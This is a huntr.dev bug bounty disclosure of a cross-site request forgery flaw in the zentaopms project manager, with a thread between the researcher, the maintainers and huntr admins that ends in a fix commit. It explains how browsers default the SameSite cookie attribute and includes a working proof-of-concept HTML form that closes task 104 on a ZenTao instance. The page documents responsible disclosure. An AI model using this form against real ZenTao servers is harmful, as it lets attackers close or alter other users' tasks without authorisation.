Cross-Site Request Forgery (CSRF) in easysoft/zentaopms

Valid

Reported on

Jul 28th 2021


✍️ Description

When a cookie is set without a SameSite attribute, each browser applies a default of its own. Chrome and other Chromium-based browsers treat such a cookie as SameSite=Lax: the cookie is withheld from cross-site POSTs but is still sent on top-level cross-site GET navigations, so an application that performs add/delete/alter operations in a GET request remains vulnerable to CSRF even there.

Firefox and Safari (two of the big ones) do not apply the Lax default; they treat the missing attribute as SameSite=None and send the cookie on every cross-site request, which leaves both POST and GET requests exposed to CSRF.

In Firefox and Safari I can close/edit, via CSRF, any project task that the user is already allowed to close/edit manually.
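The browser-side rule described above, as an added example written for this page (not zentaopms code and not from the original report): a small Node.js model of whether a browser attaches a cookie to a cross-site request, given the cookie's SameSite attribute and the browser's default when the attribute is missing. The cookie name `zentaosid`, the browser list and the two constructed requests are assumptions; the model leaves out the Secure requirement for SameSite=None and Chromium's temporary "Lax+POST" exception, so it is a simplification of the real rules.

```javascript
// Added example (not zentaopms code): model of cookie attachment on cross-site
// requests under the SameSite rules. Simplified: ignores the Secure requirement
// for SameSite=None and Chromium's temporary "Lax+POST" exception.

// Defaults applied to a cookie that carries no SameSite attribute (2021 behaviour).
const BROWSER_DEFAULTS = { chromium: "Lax", firefox: "None", safari: "None" };

// Methods with which a Lax cookie is still sent on a top-level cross-site navigation.
const SAFE_METHODS = ["GET", "HEAD", "OPTIONS", "TRACE"];

function effectiveSameSite(cookie, browser) {
  if (!(browser in BROWSER_DEFAULTS)) throw new Error(`unknown browser: ${browser}`);
  return cookie.sameSite ?? BROWSER_DEFAULTS[browser];
}

// request: { crossSite: bool, method: "GET"|"POST"|..., topLevel: bool }
function cookieIsSent(cookie, browser, request) {
  if (!request.crossSite) return true;                  // same-site: always sent
  switch (effectiveSameSite(cookie, browser)) {
    case "None":   return true;                         // sent on every cross-site request
    case "Strict": return false;                        // never sent cross-site
    case "Lax":    return request.topLevel && SAFE_METHODS.includes(request.method.toUpperCase());
    default:       throw new Error("unexpected SameSite value");
  }
}

// Does the CSRF PoC succeed, i.e. does the victim's session cookie ride along
// with the attacker-triggered request? One answer per browser.
function pocOutcome(cookie, request) {
  const result = {};
  for (const browser of Object.keys(BROWSER_DEFAULTS)) {
    result[browser] = cookieIsSent(cookie, browser, request);
  }
  return result;
}

// Constructed scenarios matching the report: an attacker page submits a
// top-level form to the task-close endpoint, or links to it with a GET.
const sessionCookie = { name: "zentaosid" };                          // assumed name, no SameSite attribute
const formPost = { crossSite: true, method: "POST", topLevel: true };  // what PoC.html produces
const linkGet  = { crossSite: true, method: "GET",  topLevel: true };  // same action reachable by GET

console.log("POST form, cookie without SameSite:", pocOutcome(sessionCookie, formPost));
// -> { chromium: false, firefox: true, safari: true }
console.log("GET navigation, cookie without SameSite:", pocOutcome(sessionCookie, linkGet));
// -> { chromium: true, firefox: true, safari: true }
console.log("POST form, SameSite=Lax set explicitly:", pocOutcome({ ...sessionCookie, sameSite: "Lax" }, formPost));
// -> { chromium: false, firefox: false, safari: false }
```

Run it with `node` and compare the three lines: the first reproduces the report's observation (the POST PoC works in Firefox and Safari but not Chromium), the second shows why Lax alone does not protect state-changing GET endpoints, and the third shows that setting the attribute explicitly removes the dependency on browser defaults.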

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <!-- Hide the PoC page path in the address bar -->
  <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the task-close endpoint for task 104; the victim's
         session cookie is attached by the browser when SameSite defaults to None -->
    <form action="https://demo.zentao.pm/task-close-104.html?onlybody=yes" method="POST">
      <input type="hidden" name="status" value="closed" />
      <input type="hidden" name="comment" value="nothings&#33;&#33;&#33;&#32;&#58;&#41;&#41;&lt;br&#32;&#47;&gt;" />
      <input type="hidden" name="uid" value="6101a5cf9d997" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Save this as PoC.html and open it in Firefox or Safari while logged in to the target; after clicking the button, the project task with id 104 has been closed.

💥 Impact

This vulnerability allows an attacker to close or edit any project task of any user.

We have contacted a member of the easysoft/zentaopms team and are waiting to hear back 4 months ago
amammad
4 months ago

Researcher


Hey easysoft team, if you want any help or suggestions on these vulnerabilities, just tell me.

amammad
4 months ago

Researcher


@admin

Hey man how are you today? :)

The maintainer said they can't find any link related to this report:

https://github.com/easysoft/zentaopms/issues/69#issuecomment-892313848

Jamie Slome
4 months ago

Admin


I am forwarding this to Ziding to look into further. Cheers!

Ziding Zhang
4 months ago

Admin


Hey amammad, I've sent another email to them for you.

We have contacted a member of the easysoft/zentaopms team and are waiting to hear back 4 months ago
easysoft/zentaopms maintainer
4 months ago

Hello, we have received the reports and we'll check the issue.

amammad
4 months ago

Researcher


Yeah sure, if you want any ideas for fixing these vulnerabilities I can help you.

easysoft/zentaopms maintainer
4 months ago

Hello, we have received the email and will check it soon. Thanks a lot.

easysoft/zentaopms maintainer
4 months ago

We will release a patch soon.

amammad
4 months ago

Researcher


Thanks for your quick fix...

Can you just validate my reports until the patches are released, please?

easysoft/zentaopms maintainer
4 months ago

Thanks for your reports. I am a contributor of zentaopms. If we fix it, I will notify you.

amammad
4 months ago

Researcher


Hey zentaopms team, I just want to make sure that you haven't had any problems; if you want any fix suggestions, feel free to tell me.

xia0ta0
4 months ago

Hello amammad, I enabled the CSRF protection in zentaopms. This commit fixes the vulnerability: https://github.com/easysoft/zentaopms/commit/cb40696190d69efd95df055abbd330ab2cb72008

easysoft/zentaopms maintainer validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
easysoft/zentaopms maintainer
4 months ago

We have fixed the issue on GitHub. When we mark the issue as fixed on huntr, the system needs a fixer to be selected to be rewarded, but there is nobody to select. Is that OK?

amammad
4 months ago

Researcher


Yeah, it is OK, no problem.

Can you validate the other CSRF reports that I reported on different endpoints?

amammad
4 months ago

Researcher


Can you give me any feedback about my last comment?

amammad
4 months ago

Researcher


If you have a problem with the system, you can use @admin in your comment to get an answer from them.

easysoft/zentaopms maintainer confirmed that a fix has been merged on 5a9f7f 4 months ago
The fix bounty has been dropped
easysoft/zentaopms maintainer
4 months ago

@admin >> "Can you validate the other CSRF reports that I reported on different endpoints?" Where can I find these reports?

amammad
4 months ago

Researcher


Hey dear @xia0ta0 and easysoft team, if you have already registered on huntr.dev you can see the content of the following reports:

https://www.huntr.dev/bounties/c4c79696-4431-4eb7-a334-1e2c766de86c/
https://www.huntr.dev/bounties/20099a57-8ea8-4c11-a46b-c1796b839f9c/
https://www.huntr.dev/bounties/8f04caa0-5545-4819-996a-a4701e4753aa/
https://www.huntr.dev/bounties/5690899e-9171-40bb-895a-77d015fa946f/
https://www.huntr.dev/bounties/98001390-98be-4dd9-8cf3-0c01cd02d2c4/
https://www.huntr.dev/bounties/00986980-56e7-4b3d-87e9-7eb29b320687/
https://www.huntr.dev/bounties/1c137804-4cb5-4bcb-be2e-68c33a6e04e5/

Jamie Slome
4 months ago

Admin


@maintainer - let me know if you need further support here!